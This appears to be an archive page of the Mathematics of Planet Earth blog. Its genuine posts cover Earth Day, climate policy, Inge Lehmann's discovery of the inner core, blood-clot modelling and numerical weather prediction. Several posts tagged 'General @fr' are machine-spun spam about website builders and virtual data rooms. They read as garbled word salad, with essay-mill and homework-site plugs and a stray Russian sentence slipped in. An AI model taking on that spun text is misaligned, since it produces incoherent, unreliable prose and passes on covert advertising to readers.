What is MPE?

Mathematics of Planet Earth (MPE) is a grass-roots movement to enhance our understanding of the impact of human activities on Planet Earth by developing mathematical and computational models of physical phenomena and using data analytics to support science-based decision making. 

MPE activities fall into four broad categories:

  • Planet Earth as a physical system: climate dynamics, Earth’s oceans, atmosphere, biosphere, and cryosphere;
  • Planet Earth as a system supporting life: mathematical ecology, carbon cycle, food systems, natural resources, sustainability;
  • Planet Earth as a system organized by humans: land use, energy, communication, transportation, socio-economics;
  • Planet Earth as a system at risk: global change, biodiversity, water, food security, epidemics, extreme events.
Posted in General | Tagged , , , , | Leave a comment

April 22, 2020 — 50 years of Earth Day

On April 22, 1970, Earth Day was born.  Twenty million Americans — 10% of the U.S. population at the time — took to the streets, college campuses and hundreds of cities to protest environmental ignorance and demand a new way forward for our planet. Earth Day was the unified response to an environment in crisis — oil spills, smog, rivers so polluted they literally caught fire. 

On April 22, 2020, we will celebrate the 50th anniversary of Earth Day. This time, our planet faces two global crises: the COVID-19 pandemic, which is immediate, and the climate crisis, which is slowly building.  Both will have enormous economic and social impact. Both are relevant to MPE.

The world was not prepared for a coronavirus. Leaders ignored hard science and delayed critical actions. The consequences are terrifying and deadly.  The climate crisis is no less real. It will be the most pressing issue for the next generations. Let us all support the movement for a cleaner, healthier planet.

Posted in General | Tagged | Leave a comment

Major Website Constructors Reviews! | Create Your Own Website

So How Regarding Website Building contractors? Websites.

You need your internet site to work upon various systems so readers and likely customers can certainly access and view your webblog. Consider what features and efficiency your site will not only at present need, but additionally later on. The web page is like the theory itself. The new web page is modern day and has all of the new sociable features such as Facebook. Essentially, a fundamental web-site is supplied a subdomain for that smallest package and a typical domain for the remainder. That it is never recently been simpler to set up a professional-looking, design-forward site.

Be sure to really use a site contractor by endeavoring to do the things you truly want on the site. The site features a immense amount of whitespace and navigation. Head your internet commerce website may be available in over 50 different languages depending upon the region you target in. If, on the flip side, you want to make a more complicated web-site like an online store site, you could be better suitable with a improved site designer, one that attributes advanced style and coding tools. If perhaps on the flip side, you seeking to cause a more elaborate website as an eCommerce web-site, you might be much better suited with a more sophisticated web page builder, one that features leading-edge design and even encoding resources, for example. Sites are the journey of business success, and generating a website was made less hard than ever due to innovating tools utilized for website creation. Your hair hair and facial salon website have to appear fantastic.

Each site designer provides a exclusive approach to coming up with, building, together with editing a web site and you’ll ought to choose what one best fulfills your requirements. The web page builder is really easy and simple to make use of overall. The right website contractors have a walk-through that tells you the way to earn a site quickly. It’s important to select the very best web page builder for your requirements.

Web page builders are the ideal solution for individuals or small businesses having low costs. In spite of the truth that most site builders are a breeze to work with, not all all of them make it simple to make an e-commerce site. Almost all small online business website contractors provide a community forum where you could publish a question, along with the community will attempt to assist you solve your problem.

A site designer is an excellent option for beginners who else haven’t any knowledge in website development, yet desire to produce a website themselves. Nearly all website builders are intended for newbies who have no experience within web design and development. They will offer you a good number of topics from which you can find dating to start producing your website. Although they do enable you to sign up for cost-free, as a company owner, you don’t have you a chance to play around with numerous different ones to figure it out. They offer at least a small number of free designs, or themes, to help you get started out with developing your website .

Решить, что делать, если spot more information зуб раскололся, сможет только врач.Vistaprint’s web site builder may be a primitive software which makes your internet site seem affordable. Vistaprint web-site builder gives you accessibility to an entirely free image library. You could use the Vistaprint website builder for free for a single 30 days.

How To Create A Website?

If a web page builder provides bare minimum, it might be an indication that customer service proceeding receive is definitely the bare minimum also. The entire reason for website building contractors is they make the exercise of developing an attractive site so easy of which anybody can do it with no coding knowledge necessary. The web site contractors supply you with the many tools essential to create an internet page all on your own, though. There are many different internet site builders to be found on the business, all providing an assortment of capabilities from responsive themes plus hosting place to e-commerce features. There are they available on the market, all offering a range of features from receptive themes together with hosting area eCommerce functions.

The particular builder on its own is very clear-cut to utilize for individuals with very little if any site generation experience. Before starting searching for your blog builder, avoid and consider what your web page building requires are. You must ensure your websites builder lets you optimize every bit of content material on your site. Whatever the case, some sort of responsive web-site builder having great search engine optimization strategy together with awesome operation would crank out no visitors if it’s real world.

Posted in General @fr | Leave a comment

Things You Won’t Like About Business and Things You Will certainly | Data room providers

What You Don’t Know About Organization

Your organization is most probably not really known for the enormous points it does however for the very little things can not succeed 6th. Beginning a home-based business may be a great incredibly lucrative and doing profession with respect to you you members. One thing anyone have to do before opting for starting a residence business should be to evaluate your circumstance. It is usually financially rewarding and set you in control. Should you truly believe that you can easily begin a home-based organization and develop a lucrative income operating just a few of several hours every single day, in that case you’re terribly wrong. Starting a home-based organization might be fascinating to you but if perhaps you aren’t going to prepared to commit to your business, you’ll definitely fail. Establishing a great online organization at home may be relaxing challenging when you really become involved on that.

Best Organization Selections & Vdrs

vdr nedir

Simply mainly because the business begins to make earnings, VC dollars have to be reimbursed, eliminating the repayment of debt. Prior to debut of this web, businesses were made to work with more incorrect techniques of analyzing the data and increasing the profitability. Many organisations conduct surveys online and interviews to figure out the ideas of consumers. It’s actually possible to search for the services of a business writer set up the company application or you may carry out it yourself. Match with different co-owners how you would like to supply the company prepare. Through the a couple of exclusive aspects of DRONE, it’s possible to make a strategic organization program and move your organization into maximum success.

Your business can grow fast and you’re carrying out everything that you are able to to attain superb growth. Analysis and research your organization Just as with additional organization this is important to check into the organization, and stay sure it truly is something widely used for people. 1 business can currently have associates most over the world. A thriving organization will at all times possess a classy risk management program system which in turn facilitates all of them to help to make much better alternatives with regards to output and occupation issues. Many businesses are the simple truth is knowing the principal rewards of an electronic deal bedroom. The few moments you will need developing the exact significantly well worth with regards to your organization, knows that the most important stage is really the absolute just about all thing. While the service can be utilized for a number of projects, it includes limited features in assessment to various other VDR service providers. Since all their services can be extremely widespread, they’re a very good choice intended for large businesses that could afford quality and total info management products and services. Today, cloud products and services aren’t only within organizations, they are really frequently all-pervasive. Every provider varies in their rates, thus carrying out a tiny homework to understand which one particular lines up with your company, budget and desired performance is essential in making an experienced decision. It could recommended to pick a provider which has already recently been used in numerous sophisticated nancial business, including IPOs. Gleazer school of education, graceland university lamoni, iowa cannon-clary school of education, harding university do my homework from homework-writer.com searcy, ark. Other services may allow of a definite quantity of GBs, or offer a range, and charge with respect to overages in case the need arises. Furthermore, you can find that it is helpful to discover a digital data space provider that can customize that according to your requirements. In addition, a large number of digital info space suppliers give you personal fitness training if important.

Posted in General @fr | Leave a comment

Digital Data Space is a required tool with respect to Due Diligence

In cases where you ready your digital info room you raise the value of your firm. A terrific details place will help preserve you as well as your investors minute in lots of techniques. As you require additional place helping put apart info, the purchase value raises. The digital details place is going to supply you with various positive aspects. The digital Digital Data Rooms includes a number of applications it’s extremely multipurpose. The details room should have the central value. A across the internet data place (sometimes labeled as a VDR) is normally an internet net internet marketer archive facts that is typically employed with respect to the goal behind the saving and supply of documents. In the many instances, Digital Data Room can come to be opened up within just around 30 minutes and the the greater part of which would definitely provide multilingual access, mobile phone user interface and a number of other hassle-free choices. A large amount of virtual info room is just an individual from the great financial determination cash a person might help to generate to end up being sure folks are prompt within your company result furthermore to period. Digital data areas are manufactured for the reason that a means to halt needless info leakages and set a smooth technique of sharing the files at any moment, wherever you’re. Finally, a digital info area enables institutions to avoid wasting crucial forms in a incredibly safe and sound central archive, ensuring they’re prepared and organized just for everything that may take place prior to, during, or pursuing a IPO. It includes a wide selection of applications plus its particularly open. The simplest, the very best and secure means to do it is to open a digital data space.

Info bedroom is actually an essential program intended for due diligence. The digital data bedrooms are the sites in the internet. online homework sites. A sleek, cost-justified digital info space won’t ever need to have you to find the money for hundreds of fancy features you’ll never use. Commonly, potential clients need to get an elementary decision whenever they would like to operate the completely free of charge computer software or perhaps if they happen to be prepared to go over a request. Therefore, the customer would take pleasure in the feeling of having most the records protected on several levels, would take pleasure in the extremely apparent software and qualified support group. Some of the possible customers whom make do visits to a internet site is going to do therefore only pertaining to research functions and refuses to purchase. It is strongly suggested to pick a provider that has already recently been used in several complicated transactions, which include IPOs. Furthermore, you might realize that it has the useful to discover a digital data room provider who are able to customize this according to meet your needs. Additionally, a large number of digital info room suppliers provide personal training if necessary. Mainly because it comes with to carry out with leading digital data room providers in Canada a great specific digital info room evaluation is important.

Just for more info regarding Digital Info Area just click here – .

Posted in General @fr | Leave a comment

The Tried and True Method for Virtual Info Security in Step by Stage

If you take care of the data space for the first time, it’s considerably better receive familiar with the LEADING Online Data Space Suppliers Assessment. The digital data area features evolved to turn into a tool to facilitate the entire deal training program, not just meant for to carry out research. The very primary step up setting up up the digital info room is usually to opt intended for a supplier utilizing online data room comparison sites and digital data area reviews. It enables corporations to gain a competitive benefit in the industry. There are specific techniques that you’ll need to have for you to choose the best possible virtual data room. Even though virtual info rooms provide you with many advantages, it is usually not appropriate for each and every business. A digital data area (sometimes known to due to a VDR) is normally an online internet marketer database details which will is employed with regards to the keeping and passing them out of reports. Web secureness issues along with the secureness of information and data integration are a few of the significant difficulties faced by the digital data room users. To get started with, really highly a good idea to help to make a resolve about the key tasks for the digital data space providers. From your discussion to date, it’s visible there are actually many advantages of switching to virtual info room. The online world data talk about is also possible. Of direct, it can be available for you. Thus there is certainly no have to check on records each and every one of the second. Values VDR is simply a extremely safe and sound, trusted and user friendly online data room.

Details of Digital Data Reliability

You may become wanting to know how diverse a digital data room is comparison for the various file-sharing services which are widely presented. The digital data room has a broad range of applications which is extremely adaptable. Also read more about teaching reading through poetry, corralling reluctant readers at the ranch and, teaching reading cheap essay order through the use of students’ writings. That generally forwarded to simply because VDR is a series of amazing extranets that provides over the internet repository of data. To deduce, vogue applied in combination with physical data room or like a stand-alone instrument, there can be no question that VDR will assist grow the flexibility of the company to share sensitive info to group in a safeguarded system. Usually, digital info areas are applied for legal transactions, just like mergers and acquisitions, but they’ve become a reputed method of safe guarding enterprise venture. The protected digital info room really should to have middle price tag. After you execute via the internet info bedroom into an organization technique, you are heading to have the ability to track benefits. Needless to say, it has the highly advisable to select the well-liked and the perfect info space. Several individuals possibly think that your data room is actually a pricey enjoyment. Electronic data areas are likewise known as Deal Rooms. An electronic info place requirements to be simpler to set in place and keep. As well, that takes on an important position in managing the complying underneath the legal organization function. A decent digital data area is 1 which offers you the flexibility you need to do points the course you would like.

Find more data regarding Safe Online Info Bedroom below – .

Posted in General @fr | Leave a comment

Four reasons why the fight against climate change is likely to fail

[The following post by Steven Mufson appeared in “The Washington Post” Wonkblog, March 11, 2014]

Democrats in the Senate stayed up all night talking about the perils of climate change. But while there’s hope that technology, changing consumer and business practices or new policies could finally turn the tide and slow or reverse climate change, there are also good reasons to think those efforts will fail.

  • There isn’t enough research and development into ways of generating energy without emitting carbon dioxide. “The U.S. energy sector invests only 0.23 percent of its revenue in research and development, and federal R&D spending is only half of what it was in 1980,” says a new paper by non-profit centrist policy group Third Way.
  • The price of fossil fuels doesn’t include the cost of environmental damage and climate change. Legislation, meanwhile, isn’t doing the trick when it comes to increasing the price. A cap and trade program is complicated, virtually impossible politically, and not working all that well in Europe. A carbon tax – even a small gasoline tax – won’t get adopted by Congress.
  • Many countries still subsidize fossil fuels, including those in the Middle East where consumption is growing fastest. The International Monetary Fund puts the annual cost at $1.9 trillion (on a post-tax basis).
  • China is determined to increase living standards with more cars, more power plants, and more everything. In 2012, the average Chinese emits 6.2 metric tons a year of carbon dioxide versus 17.6 metric tons for the average American. Closing even one-third of that gap (even with more energy efficient economy) will generate a lot more emissions.

The Global Energy Initiative, a non-profit group devoted to promoting clean energy and slowing climate change, asked a handful of economists – liberal and conservative — for their views on what to do about climate change and the replies are somewhat gloomy.

Former top Obama economic policy adviser and former Harvard University president Larry Summers lists three items: eliminate energy subsidies, more funding for basic energy research, and carbon taxes. “As a practical matter my guess is the world will produce non fossil fuel power in the next 25 years at today s fossil fuel prices or it will fail with respect to global climate change,” he says.

The iconoclastic Bjorn Lomberg, director of the Copenhagen Consensus Center and adjunct professor at Copenhagen Business School says: “The only way to move towards a long-term reduction in emissions is if green energy becomes much cheaper.” He supports suggestions to increase research and development 10-fold to $100 billion a year globally.

Tyler Cowen, professor of economics at George Mason University said: “The most likely scenario is that we will find out just how bad the climate change problem is slated to be.”

Posted in Climate Change | Tagged | Leave a comment

How Inge Lehmann discovered the inner core of the Earth

We cannot see the interior of the Earth, and yet we know much about it: there is a viscous mantle below the thin solid crust. The mantle, approximately 3200km thick, surrounds the core. The core itself is divided into two parts, an outer core and an inner core. The inner core is ferrous and solid. How do we know all that? I like to tell my students that we put our “mathematical glasses”, to “see” what we cannot see with our eyes.

If the interior of the Earth is not homogeneous, then this means that the speed of signals traveling inside the Earth is not homogeneous. When large earthquakes occur, they generate strong seismic waves: these are detected and recorded by seismographs all around the world. They provide raw data that can further be analyzed. Reconstructing the interior of the Earth by analyzing what is recorded at the surface is solving an “inverse problem”. When an earthquake occurs, a first inverse problem to solve is to localize the epicenter of the earthquake.

Earthquakes generate P-waves (pressure waves) and S-waves (shear waves).
S-waves are strongly damped when traveling in viscous media, and hence not recorded far from the epicenter. This provides evidence for a liquid interior, as well as information on the thickness of the crust. On the contrary P-waves travel throughout the Earth and can be recorded very far from the epicenter.

Inge Lehmann was a Danish mathematician. She worked at the Danish Geodetic Institute, and she had access to the data recorded at seismic stations around the world. She discovered the inner core of the Earth in 1936. At the time, it was known that the mantle surrounded the core. The seismic waves are traveling approximately at 10km/s in the mantle and 8km/s in the core. Hence, the waves are refracted when entering the core. This should mean the existence of an annulus region on the Earth, centered at the epicenter, where no seismic wave should be detected. But Inge Lehmann discovered that signals were recorded in the forbidden region. A piece of the puzzle was missing… She built a toy model (see figure) that could explain the observations and was later tested and adopted.

In this toy model she inserted an inner core in which the signals would travel at 8.8km/s.
If you analyze the law of refraction, namely $\frac{\sin\theta_1}{v_1}= \frac{\sin\theta_2}{v_2}$, then the equation may have no solution for $\theta_2$ if $v_1$ is smaller than $v_2$ and $\theta_1$ is sufficiently large. This means that if a wave arrives on the slow side, sufficiently tangentially to the separating surface between the two media, then it cannot enter the second medium. It is then reflected on the separating surface. Hence, seismic waves can be reflected on the inner core. This is why they could be detected in the forbidden regions.

The toy model appearing here had been completed from a figure of Inge Lehmann and illustrates the black reflected waves. Note that also some refracted waves (in brown) enter the forbidden regions.

Posted in Geophysics | Leave a comment

Moving toward a long-term collaboration around MPE

MPE2013 was launched at the winter meeting of the Canadian Mathematical Society in Montreal on December 7, 2013. At that time, approximately one hundred partners in several countries had planned a range of special scientific and outreach activities, which were to take place around around the world in 2013 on the themes of “Mathematics of Planet Earth.” Subsequent launches at the national level brought in many new partners who developed their own MPE-related activities, particularly in the areas of outreach and curriculum development. In the course of the year, the enthusiasm kept growing, to the point that now, at the end of 2013, more than 140 partners are affiliated with MPE2013.

This level of cooperation of the world mathematical community has been without precedent. Of course, compared to what existed 20 years ago, technology makes it easier to collaborate across boundaries. But there is more to it: MPE2013 helped change the image of mathematics among students and the general public. Many activities sponsored by MPE2013 illustrated the role that mathematics plays not only in addressing the planetary challenges but also in discovering and understanding our planet, its interior dynamics and its movement in the solar system. Teachers have new material to provide exciting answers to the question: What is mathematics useful for? All this material is shared on the MPE website; it will be further enriched over the coming years and will be a lasting legacy of MPE2013—tangible evidence that collaboration is beneficial for our community.

The interest in MPE2013 among the research community has also been very important. As research mathematicians, we are captivated by mathematical problems, and MPE2013 has demonstrated that planetary issues lead to many new and challenging problems. In the framework of MPE2013, we have organized summer schools for young researchers. Of course, a researcher cannot be trained in a few weeks, but what has been accomplished is really a first step toward what should be a long-term goal. This is true especially in view of the fact that the problems related to planet Earth are extremely complex; the ingredients are all interconnected, they cannot be studied in isolation. As mathematicians, we have some experience building and analyzing models of complex systems, but we absolutely need to cooperate with other disciplines to capture the essence of the problems and improve our models so they are as faithful as possible to the real world, yet manageable in the context of mathematics. MPE2013 has exposed the immensity of the research field that needs to be explored.

“Mathematics of Planet Earth” needs to continue, and this is why MPE2013 will morph into MPE on January 1, 2014. MPE will maintain the momentum of multilevel collaborations (researchers and educators) within the world mathematical community. The foundation has been laid, MPE will take on the long-term task, including the training of new researchers and supporting collaborations with researchers in other scientific disciplines.

This contribution is the last official post of the MPE2013 Daily Blog. MPE will have its own blog, which will appear on a less regular basis. Please contact us when you want to report on new developments of MPE.

Hans Kaper and Christiane Rousseau

Posted in General | Leave a comment

Who ran the MPE2013 Daily Blogs during the last year?

During all of MPE2013 we could enjoy almost daily blogs, in both French and English. Now that the year 2013 is coming to an end, we can look back and ask ourselves who ran the blog? None of us had realized at the beginning what a challenge this would represent. In the beginning it was relatively easy. We were writing the posts ourselves, and it was exciting to explain all those aspects of MPE that we were discovering and to learn about new topics in the posts that were written by others. After several months, it became more difficult: the obvious bloggers had contributed a fair number of posts, and if people were asked at the last minute, they would politely decline, leaving quite a few posts to be written by the members of the editorial committee.

For the English blog, we formed a team, and each member of the team took responsibility for providing posts one day a week. The team was chaired by Hans Kaper, who was also responsible of posting the blog entries. Except for short periods when he was traveling, Hans posted each entry: this included dealing with the formulas and images whenever there were some, and Hans would always take the time to do some copy-editing. We are extremely grateful to him for the fantastic job he accomplished, and I use the opportunity of this post today to thank him on behalf of the readers of our blog. Many thanks also to the other members of the editorial team: Estelle Basor, Brian Conrey, Jim Crowley, Bogdan Vernescu, and Kent Morrison, who also helped with the posting of the blogs.

I cannot mention the English blog without also mentioning the French blog. The title of this blog was “Un jour, une brève”, with a short “story” on Planet Earth every working day. The description was the following: The French blog aims at publishing one text a day (except on weekends) in connection to the themes of “Mathematics for the Planet Earth”. These will be very short notices, say half a page each (in principle in French), without any technical details, which are intended to be read by a broad audience (that may include pre-university students). The goal is two-fold: we wish to explain on the one hand how mathematics can bring some useful information and on the other hand how the mathematical activity is supplied with new problems, new questions raised by the surrounding world. They also brilliantly won their bet with high-quality contributions and several thousands hits a day! And their posts will be published in a volume sometimes next year. In the name of MPE2013, we would like to thank their fantastic executive team: Martin Andler, Liliane Bel, Sylvie Benzoni, Thierry Goudon, Cyril Imbert, Pierre Pansu and Antoine Rousseau, which worked with an efficient editorial team.

Some countries also presented a blog with a somewhat lower frequency. We mention, for instance, the blog of MPE Australia. To all these countries we express our congratulations and thanks.

Christiane Rousseau

Posted in General | Leave a comment

A Thematic Semester on “Biodiversity and Evolution”

A thematic semester on “Biodiversity and Evolution” recently ended at the CRM (Centre de Recherches Mathématiques) in Montreal. It was packed with activities, drawing both mathematicians and biologists to a stimulating exchange of recent results, methodologies and open problems.

One of the challenges for a mathematician interested in this topic is the range of biological questions that are associated with this area. The concept of evolution—the change in inherited characteristics of populations over successive generations—affects every level of biological organization, from the molecular to organismal and species level. It is also associated with a variety of questions about how and why humans have evolved to what we are today (evolutionary neuroscience, physiology, psychology), as well as in our understanding of health and disease (evolutionary medicine). Since diversity of life on Earth is crucial to human well-being and sustainable development, evolution is also highly connected to the impacts of climate change. This goes to show the importance of fully comprehending fundamental evolutionary mechanisms.

The driving processes of evolution—mutation, genetic drift and natural selection—are, independently, relatively easy to understand. However, when combined they lead to different phenomena, and it is remarkably tricky to unravel the role of the different evolutionary causes from their signatures. At the molecular level, most of the complexity is due to exchanges of genetic material (recombination, gene duplication, gene swapping, etc.). At the organismal/ecological level the interactions between the species (food webs, predator-prey systems, specialists vs. generalists) or between individuals with different organizational/social roles (cooperators, defectors, etc.) lead to complex dynamics of population structures.

All of these issues were extensively discussed in the six workshops held at the CRM from August to December, 2013:
1) “Random Trees” focused on stochastic techniques for analyzing random tree structures;
2) “Mathematics for an Evolving Biodiversity” discussed probabilistic and statistical methodologies for drawing inferences from contemporary biodiversity;
3) “Mathematics of Sequence Evolution” presented computational approaches to investigation of function and structure of genetic sequences;
4) A minicourse on “Theoretical and Applied Tools in Population and Medical Genomics” gave an introduction to modern population genetics and genomics;
5) “Coalescent Theory” focused on the probabilistic techniques for reconstructing evolutionary relationships using a backwards in time approach; and
6) “Biodiversity and Environment — Viability and Dynamic Games Perspectives” combined biological, economical, social and interdisciplinary perspectives in mathematical modeling of individual or species interactions and their consequences for biodiversity and the environment.

A sequence of special lectures were given during the term by Aisenstadt chairs: David Aldous (UC Berkeley) and Martin Nowak (Harvard), as well as by Clay senior scholar: Bob Griffiths (Oxford). Abstracts and slides of the presentations can be found here.

What was apparent to anyone following all of the above workshops was the varied combination of approaches from distinct scientific disciplines: genomics, ecology, economics, computational biology, statistical genetics, and bioinformatics. Given the production and analysis of massive environmental, genetic and genomic data, it is clear that mathematical techniques are extremely useful in the advancement of these scientific areas. As randomness plays a prominent role in evolutionary processes, stochastic processes and random combinatorial objects are key players in its analysis and development. For young mathematicians interested in the area I would highly recommend a solid background in probability and stochastic processes, and some practice in simulating random processes.

Lea Popovic
Dept of Mathematics and Statistics
Concordia University

Posted in Biodiversity, Workshop Report | Leave a comment

Mathematical Modeling and Haemostasis

The study of blood and the mechanism of blood clotting can be traced back to about 400 BC and the father of medicine, Hippocrates. However, the first larger advances came with the invention of a microscope and the beginning of its extensive use in research in the 17th century. Since the late 19th century until today many important breakthroughs have been made in the research of haemostatic mechanisms, leading to an excellent understanding of all of the related individual systems—the vascular system, blood cells, the coagulation pathways, and fibrinolysis. However, due to the complexity of these systems and their interaction, and difficulties of in vivo experiments, many important questions are still open for further study.

Haemostasis results in the formation of a blood clot at the injury site which stops the bleeding. The mechanism is based on a complex interaction between four different systems: the vascular system, blood cells, the coagulation pathways, and fibrinolysis. Malfunctions or changes in these systems can result in imbalance and lead to either bleeding or thrombotic disorders. Thrombosis is a life-threatening clot formation that can be caused by numerous diseases and conditions such as atherosclerosis, trauma, stroke, infarction, cancer, sepsis, surgery and many others. Thrombosis is the leading immediate cause of mortality and morbidity in modern society and a major cause for complications and occasionally death in people admitted to hospitals. Anti-coagulation medicaments that are usually administered to such patients carry a serious risk of bleeding with potentially fatal consequences. This explains the necessity of further studies of haemostasis.

During the last few decades mathematics has played an important role in the studies and analysis of blood clotting in vitro and in vivo. Each of the systems involved has been extensively modeled and analyzed using mathematical tools. This has enabled posing, evaluation and justification of biological hypothesis. First of all, the knowledge of fluid flows and hydrodynamics was used to model blood as a homogenous viscous fluid, its flow in various structures of vessels and its non-Newtonian properties. These models are usually based on Navier-Stokes equations. Furthermore, as the non-Newtonian properties of blood originate from blood cells which are suspended in blood plasma, the blood was modeled as a complex fluid in which individual cells were described. Such models allow studying of cellular interaction, the behavior and distribution of cell populations in flow. In order to describe the complex structures and behavior of individual blood cells, many cell models were developed and compared to experimentally observed characteristics and behavior, especially for erythrocytes. An example of such model is given in [1].

The complex coagulation pathways which include more than 50 proteins and their interactions were extensively modeled and analyzed by systems of partial differential equations (PDEs). The systems describe concentrations of proteins, their diffusion and reactions in vitro or in vivo (in flow). A few models were done to describe and study equally complex regulatory network of platelet interactions and the corresponding intracellular signalling.

Formation of blood clot in vivo consists of two main processes – platelet aggregation and blood coagulation. The former results in the formation of a platelet aggregate, while the latter ends by fibrin polymerization and the formation of a fibrin net. The two formations influence each other and enable the blood clot formation. The flow velocity is reduced in the platelet aggregate and protects the protein concentrations from being taken by the flow, thus enabling the coagulation reactions to occur in its core. The fibrin net which forms inside the platelet aggregate reinforces the aggregate, allowing it to grow to a necessary size and to endure the pressure from the flow.

The approaches to modeling blood clotting in flow can be divided in three main groups: continuous, discrete and hybrid models. The continuous models use mathematical analysis and systems of PDEs to describe both, the coagulation reactions [2] and the flow. In these models, blood cells (platelets) are also modeled in terms of concentrations, while the clot can be described as a part of the fluid with significantly increased viscosity. Such models correctly describe flow properties and protein concentrations in the flow. However, they are unable to capture mechanical properties and possible rupture of the clot which originate from cell-cell interactions. The second approach is to model both, the flow and individual cells, by discrete methods. There are various discrete methods that can be used to model flow, varying from purely simulation techniques to methods that are lattice discretization of hydrodynamic equations. Although suitable for description of individual cells and their interactions, such methods often do not model correctly the concentrations of proteins and their diffusion in flow.

Figure 1: A scheme of a clot obtained by model described in [3]. Reprinted with permission from [3].

The third group consists of hybrid models, which combine continuous and discrete methods in an attempt to use their individual strengths and give a more suitable description of a complex phenomenon, such as blood clotting. Within hybrid models various combinations of methods are possible. An example is given in [3], where flow of blood plasma and platelets suspended in it is modeled with a discrete method called Dissipative Particle Dynamics Method (same as in [1]). The method is used to model fluid flows because it is able to correctly reproduce hydrodynamics. As platelet aggregate demonstrates elastic properties, the interactions between platelets in the model, i.e., platelet adhesion, is described by Hooke’s law. A difference is made between the weak GPIba platelet connection and the stronger connection due to platelet activation. The continuous part of the model describes fibrin concentration and diffusion in flow. The model was used to study how platelet aggregate influences and protects protein concentrations from flow. Additionally, the model has shown a possible mechanism by which platelet clot stops growing:

  • In the beginning of clot growth, platelets aggregate at the injury site due to weak connections (Figure 2, a). The injury site is modelled as several platelets attached to the vessel wall. They initiate clot growth. Since the flow velocity is sufficiently high, the concentration of fibrin remains low.
  • The platelet clot continues to grow due to weak connections and the flow speed inside it decreases. It makes it possible for the coagulation reaction to start, and fibrin concentration gradually increases (Figure 2, b).
  • This process continues while the clot becomes sufficiently large (Figures 2, c, d). Fibrin covers a part of the clot and strong platelet connections appear inside it.
  • Flow pressure exerts mechanical stresses on the clot and weak connections can rupture. In this case the clot breaks and its outer part is removed by the flow (Figure 2, e).
  • Its remaining part is covered by fibrin and thus it cannot attach new platelets. The final clot form is shown in (Figure 2, f).

Figure 2: Platelet clot growth obtained by model described in [3]. Flow is from left to right. Reprinted with permission from [3].

The model described in [3] investigates interactions between platelet aggregate and fibrin clot. However, the overly simplified model of blood coagulation pathways results in a less correct shape of the final clot. Nevertheless, the indications of that model are confirmed by a model with a more complete description of blood coagulation pathways which also produces a more realistic final clot shape (Figure 3).

Figure 3: Final clot obtained by a more complete model of blood coagulation. Blue area denotes fibrin polymer. Flow is from left to right.

The hybrid approaches show a great potential for modelling complex phenomena. They are suitable for multiscale modelling and it can be expected that they will, in the near future, offer new insights in many biological processes of great interest.

References:
[1] N. Bessonov, E. Babushkina, S.F. Golovashchenko, A. Tosenberger, F. Ataullakhanov, M. Panteleev, A. Tokarev, V. Volpert, Numerical Simulations of Blood Flows With Non-uniform Distribution of Erythrocytes and Platelets, Russian Journal of Numerical Analysis and Mathematical Modelling, 2013, Vol. 28, no. 5, 443-458.
[2] Y.V. Krasotkina, E.I. Sinauridze, F.I. Ataullakhanov, Spatiotemporal Dynamics of Fibrin Formation and Spreading of Active Thrombin Entering Non-recalcified Plasma by Diffusion, Biochimica et Biophysica Acta, 1474 (2000), 337-345.
[3] A. Tosenberger, F. Ataullakhanov, N. Bessonov, M. Panteleev, A. Tokarev, V. Volpert, Modelling of clot growth in flow with a DPD-PDE method, Journal of Theoretical Biology 337, 2013, pp. 30-41.

Alen Tosenberger
Institut Camille Jordan
Université Claude Bernard Lyon 1, France
tosenberger@math.univ-lyon1.fr
dracula.univ-lyon1.fr

Posted in Biology | Leave a comment

Numerical Weather Prediction – A Real-Life Application at the Intersection of Mathematics and Meteorology

In the daily operation of weather forecasts, powerful supercomputers are used to predict the weather by solving mathematical equations that model the atmosphere and oceans.  In this process of numerical weather prediction (NWP), computers manipulate vast datasets collected from observations and perform extremely complex calculations to search for optimal solutions with a dimension as high as 108. The idea of NWP was formulated as early as 1904, long before the invention of the modern computers that are needed to complete the vast number of calculations in the problem. In the 1920s, Lewis Fry Richardson used procedures originally developed by Vilhelm Bjerknes to produce by hand a six-hour forecast for the state of the atmosphere over two points in central Europe, taking at least six weeks to do so. In the late 1940s, a team of meteorologists and mathematicians lead by John von Neumann and Jule Charney made significant progress toward more practical numerical weather forecasts. By the mid-1950s, numerical forecasts were being made on a regular basis (earthobservatory.nasa.gov and Wikipedia.org).

Several areas of mathematics play fundamental roles in NWP, including mathematical models and their associated numerical algorithms, computational nonlinear optimization in very high dimension, huge datasets manipulation, and parallel computation. Even after decades of active research with the increasing power of supercomputers, the forecast skill of numerical weather models extends to about only six days. Improving the current model and developing new models for NWP have always been an active area of research. Operational weather and climate models are based on Navier-Stokes equations coupled with various interactive earth components such as ocean, land terrain, and water cycles. Many models use a latitude–longitude spherical grid. Its logically rectangular structure, orthogonality, and symmetry properties, make it relatively straightforward to obtain various desirable, accuracy-related, properties. On the other hand, the rapid development in the new technology of massively parallel computation platforms constantly renew the impetus to investigate better mathematical models using traditional or alternative spherical grids. Interested readers are referred to a recent survey paper in Quarterly Journal of the Royal Meteorological Society (Vol. 138: 1-26).

Initial conditions must be generated before one can compute a solution for weather prediction. The process of entering observation data into the model to generate initial conditions is called data assimilation. Its goal is to find an estimate of the true state of the weather based on observation (e.g. sensor data) and prior knowledge (e.g. mathematical models, system uncertainties, and sensor noise). A family of variational methods called 4D-Var is widely used in NWP for data assimilation.  In this approach, a cost function based on initial and sensor error covariance is minimized to find the solution to a numerical forecast model that best fits a series of datasets from observations distributed in space over a finite time interval. Another family of data assimilation methods is ensemble Kalman filters.  They are reduced-rank Kalman filters based on sample error covariance matrices, an approach that avoids the integration of a full size covariance matrix, which is impossible even for today’s most powerful supercomputers. In contrast to interpolation methods used in the early days, 4D-Var and ensemble Kalman filters are iterative methods that can be applied to much larger problems. Yet the effort of solving problems of even larger size is far from over. Current day-to-day forecasting uses global models of grid resolutions between 16 – 50 km and about 2 – 20 km for short period local forecasting. Developing efficient and accurate algorithms of data assimilation for higher resolution models is a long-term challenge that will face mathematicians and meteorologists for many years to come.

Wei Kang
Naval Postgraduate School
Monterey, California

Posted in Mathematics, Weather | Leave a comment

Predictive Models for the Ecological Risk Assessment of Chemicals

Ecological risk assessment (ERA) is an area of national and international concern, and is increasingly being driven by the need for a mathematical underpinning that addresses relevant biological complexities at numerous scales.

A major challenge in assessing the impacts of toxic chemicals on ecological systems is the development of predictive linkages between chemically-caused alterations at molecular and biochemical levels of organization and adverse outcomes on ecological systems.

